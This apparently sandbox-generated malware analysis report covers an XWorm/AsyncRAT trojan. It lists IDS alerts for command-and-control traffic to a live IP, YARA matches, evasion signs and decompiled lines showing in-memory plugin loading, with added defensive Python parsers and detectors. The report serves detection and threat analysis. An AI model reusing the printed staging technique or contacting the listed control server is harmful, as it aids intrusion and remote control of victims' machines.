Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.116.179:1300 -> 192.168.2.9:49757
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 87.120.116.179:1300 -> 192.168.2.9:49757
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: Malware configuration extractorURLs: 87.120.116.179
            Source: global trafficTCP traffic: 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: global trafficTCP traffic: 192.168.2.9:54647 -> 1.1.1.1:53
            Source: Joe Sandbox ViewIP Address: 87.120.116.179 87.120.116.179
            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
Source: unknown | TCP traffic detected without corresponding DNS query: 87.120.116.179 (27 occurrences in the report)
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
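The "TCP traffic detected without corresponding DNS query" signature keys on connections to a public address that no DNS answer in the capture explains, which is how a hard-coded C2 address like the one above stands out. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it runs that check over constructed Zeek-style JSON records. Only the fb-t-msedge domain/IP pair and the 87.120.116.179 destination are taken from the report; the client address 10.0.0.5, the timestamps and the destination port 4411 are placeholders, since the report does not show them.

```python
"""Flag outbound TCP connections to public IPs that no earlier DNS answer explains,
the behaviour behind 'TCP traffic detected without corresponding DNS query'."""
import ipaddress
import json

# Constructed Zeek-style JSON records (not the report's pcap). The msedge domain/IP
# pair and the 87.120.116.179 destination are taken from the report; the client
# 10.0.0.5, the timestamps and the destination port 4411 are placeholders.
DNS_LOG = """
{"ts": 1736348400.10, "query": "s-part-0017.t-0009.fb-t-msedge.net", "rcode_name": "NOERROR", "answers": ["13.107.253.45"]}
{"ts": 1736348401.00, "query": "localhost", "rcode_name": "NOERROR", "answers": ["127.0.0.1"]}
""".strip().splitlines()

CONN_LOG = """
{"ts": 1736348400.50, "id.orig_h": "10.0.0.5", "id.orig_p": 51000, "id.resp_h": "13.107.253.45", "id.resp_p": 443, "proto": "tcp"}
{"ts": 1736348402.00, "id.orig_h": "10.0.0.5", "id.orig_p": 51001, "id.resp_h": "87.120.116.179", "id.resp_p": 4411, "proto": "tcp"}
{"ts": 1736348403.00, "id.orig_h": "10.0.0.5", "id.orig_p": 51002, "id.resp_h": "10.0.0.1", "id.resp_p": 445, "proto": "tcp"}
{"ts": 1736348404.00, "id.orig_h": "10.0.0.5", "id.orig_p": 51003, "id.resp_h": "87.120.116.179", "id.resp_p": 4411, "proto": "tcp"}
""".strip().splitlines()

# Ports where direct-to-IP traffic is still worth a look but is less unusual.
COMMON_PORTS = {80, 443, 8080, 8443}


def resolved_ips(dns_lines):
    """Map each IP seen in a DNS answer to the earliest time it was answered."""
    first_seen = {}
    for line in dns_lines:
        rec = json.loads(line)
        for answer in rec.get("answers", []):
            try:
                ip = str(ipaddress.ip_address(answer))   # skips CNAME/TXT answers
            except ValueError:
                continue
            if ip not in first_seen or rec["ts"] < first_seen[ip]:
                first_seen[ip] = rec["ts"]
    return first_seen


def find_direct_ip_connections(dns_lines, conn_lines):
    """One finding per (destination, port) contacted over TCP with no DNS answer
    naming that address before the connection. Private and loopback targets are
    ignored because LAN traffic routinely has no DNS lookup at all."""
    answers = resolved_ips(dns_lines)
    findings = {}
    for line in conn_lines:
        rec = json.loads(line)
        if rec.get("proto") != "tcp":
            continue
        dst = ipaddress.ip_address(rec["id.resp_h"])
        if not dst.is_global:
            continue
        answered_at = answers.get(str(dst))
        if answered_at is not None and answered_at <= rec["ts"]:
            continue
        key = (str(dst), rec["id.resp_p"])
        entry = findings.setdefault(key, {
            "dst": str(dst), "port": rec["id.resp_p"], "count": 0,
            "non_standard_port": rec["id.resp_p"] not in COMMON_PORTS,
        })
        entry["count"] += 1
    return sorted(findings.values(), key=lambda f: (f["dst"], f["port"]))


if __name__ == "__main__":
    for f in find_direct_ip_connections(DNS_LOG, CONN_LOG):
        print(f"{f['dst']}:{f['port']} contacted {f['count']}x without DNS; "
              f"non-standard port: {f['non_standard_port']}")
```

The check is only as good as the DNS coverage: a lookup that happened before the capture started, or that was served from the host's resolver cache, produces a false positive, so on production sensors the DNS window should span well before the first connection and the finding should be treated as a triage lead rather than a verdict.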

            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, XLogger.cs | .Net Code: KeyboardLayout

            System Summary

Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Code function: 0_2_00007FF887D368E6
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Code function: 0_2_00007FF887D37692
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Code function: 0_2_00007FF887D32A00
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000000.1323730382.00000000003DC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename08.exe4 vs 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Binary or memory string: OriginalFilename08.exe4 vs 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Mutant created: \Sessions\1\BaseNamedObjects\CCQxcQjeOUw0cNMQ
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: ucrtbase_clr0400.dll (2 occurrences)
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
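The static facts above (EXECUTABLE_IMAGE and 32BIT_MACHINE, the .text section flags, the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR entry that marks a .NET image, and the DYNAMIC_BASE / NX_COMPAT / NO_SEH / TERMINAL_SERVER_AWARE DllCharacteristics) are all read straight from the PE headers. The parser below is an added example written for this page, not Joe Sandbox code, and recovers the same facts from any PE file with the standard library alone. Because the sample is not reproduced here, it also constructs a header-only PE32 image carrying the same flag combination to run against; that image is a test fixture and not the analysed binary.

```python
"""Recover the report's static PE facts (COFF characteristics, DllCharacteristics,
section flags, CLR data directory) from a file's headers, stdlib only."""
import struct
import sys

# Flag values from the PE/COFF specification.
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
SECTION_FLAGS = {0x00000020: "IMAGE_SCN_CNT_CODE", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE"}
COM_DESCRIPTOR_INDEX = 14   # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: non-empty only for CLR images


def _names(table, value):
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_static_info(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32: 32-bit ImageBase and stack/heap sizes
        ndirs_off, dirs_off = 92, 96
    elif magic == 0x20B:          # PE32+: the 64-bit fields push the directories out
        ndirs_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    clr_rva = clr_size = 0
    if ndirs > COM_DESCRIPTOR_INDEX:
        clr_rva, clr_size = struct.unpack_from("<II", data, opt + dirs_off + 8 * COM_DESCRIPTOR_INDEX)
    sections = {}
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        sections[name] = _names(SECTION_FLAGS, struct.unpack_from("<I", data, hdr + 36)[0])
    return {
        "machine": machine,
        "file_characteristics": _names(FILE_CHARACTERISTICS, chars),
        "dll_characteristics": _names(DLL_CHARACTERISTICS, dll_chars),
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "sections": sections,
    }


def build_minimal_pe32(characteristics=0x0102, dll_chars=0x8540, clr=(0x2008, 0x48)) -> bytes:
    """Constructed test fixture: a header-only PE32 image with one .text section.
    It is not the analysed sample and cannot execute."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, characteristics)
    fmt = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6
    opt = struct.pack(fmt, 0x10B, 48, 0,
                      0x200, 0x200, 0, 0x2000, 0x2000, 0x4000, 0x400000, 0x2000, 0x200,
                      4, 0, 0, 0, 4, 0,
                      0, 0x6000, 0x200, 0,
                      2, dll_chars,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[COM_DESCRIPTOR_INDEX] = clr
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    text = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x200, 0x2000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + text


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe32()
    for key, value in pe_static_info(blob).items():
        print(f"{key}: {value}")
```

Run it with a file path to triage a real binary; the constructed fixture reproduces exactly the four lines the report prints for this sample. The CLR directory check is the cheap way to confirm "Net Framework" before spending time on decompilation, and a .text section that is also IMAGE_SCN_MEM_WRITE is worth a second look, since compilers do not emit that for managed code.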

            Data Obfuscation

Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null, new object[5]{Settings.Host, Settings.Port, Settings.SPL, Settings.KEY, Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null, new object[2]{Pack[2], Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null, new object[1]{Pack[2]}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs | .Net Code: Memory
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX (46 occurrences in the report)
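The Messages.cs lines in this section describe the plugin staging path: a command is split into fields on the configured separator (Settings.SPL), Pack[2] is the plugin identifier handed to the late-bound Invoke, and Pack[3] carries the plugin assembly as base64 over a compressed byte stream that the client passes to System.AppDomain.Load(byte[]), so the module never touches disk. The Python below is an added example for this page, not the sample's code or Joe Sandbox output: it unpacks a message of that shape so an analyst can recover the staged assembly from decrypted traffic. Its assumptions are labelled in the code: the separator "<SPL>" is a placeholder (the real Settings.SPL is not in the report), GZip is assumed for Helper.Decompress because the helper's body is not shown, the AES transport layer is assumed to have been removed already, and the plugin bytes are a constructed PE-looking stub.

```python
"""Unpack a staged-plugin command of the shape the decompiled Messages.cs lines
imply: fields split on the SPL separator, Pack[2] the plugin identifier handed to
Invoke, Pack[3] the assembly as base64 over a compressed byte stream."""
import base64
import gzip
import zlib

SPL = "<SPL>"   # placeholder; the real separator is the sample's Settings.SPL and is not in the report


def decompress(blob: bytes) -> bytes:
    """Stand-in for Helper.Decompress. GZip is an assumption (the helper's body is
    not shown in the report); raw zlib is tried as a fallback before giving up."""
    try:
        return gzip.decompress(blob)
    except (OSError, EOFError):
        return zlib.decompress(blob)


def parse_plugin_message(msg: str, spl: str = SPL) -> dict:
    """Return the fields a 'Plugin'/'Memory' command carries and the recovered
    assembly bytes. Assumes the AES transport layer has already been stripped."""
    pack = msg.split(spl)
    if len(pack) < 4:
        raise ValueError(f"expected at least 4 fields, got {len(pack)}")
    assembly = decompress(base64.b64decode(pack[3]))
    return {
        "command": pack[0],
        "plugin_id": pack[2],
        "assembly": assembly,
        "looks_like_pe": assembly[:2] == b"MZ",
        "invoke_args": (pack[2], len(assembly)),   # shape of the LateCall("Invoke") arguments
    }


def build_plugin_message(command: str, plugin_id: str, assembly: bytes,
                         spl: str = SPL, use_zlib: bool = False) -> str:
    """Server side of the exchange; exists only to construct test input."""
    packed = zlib.compress(assembly) if use_zlib else gzip.compress(assembly)
    return spl.join([command, "", plugin_id, base64.b64encode(packed).decode("ascii")])


# Constructed stand-in for a plugin assembly: a PE-looking stub, not a real module.
FAKE_PLUGIN = b"MZ" + b"\0" * 62 + b"PE\0\0" + bytes(range(256))

if __name__ == "__main__":
    result = parse_plugin_message(build_plugin_message("Plugin", "a1b2c3", FAKE_PLUGIN))
    print(result["command"], result["plugin_id"], len(result["assembly"]), result["looks_like_pe"])
```

On a real capture the recovered bytes are the artefact worth keeping: because AppDomain.Load(byte[]) leaves nothing on disk, the decrypted stream is usually the only place the plugin can be carved from, and a hash of the decompressed assembly is what to pivot on rather than the base64 text, which changes with every re-compression.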

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Memory allocated: B10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Memory allocated: 1A6A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Window / User API: threadDelayed 9543
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe TID: 7916 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe TID: 7920 | Thread sleep count: 9543 > 30
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe TID: 7920 | Thread sleep count: 309 > 30
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | File Volume queried: C:\ FullSizeInformation (2 occurrences)
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Thread delayed: delay time: 922337203685477
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3784605807.000000001B6B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
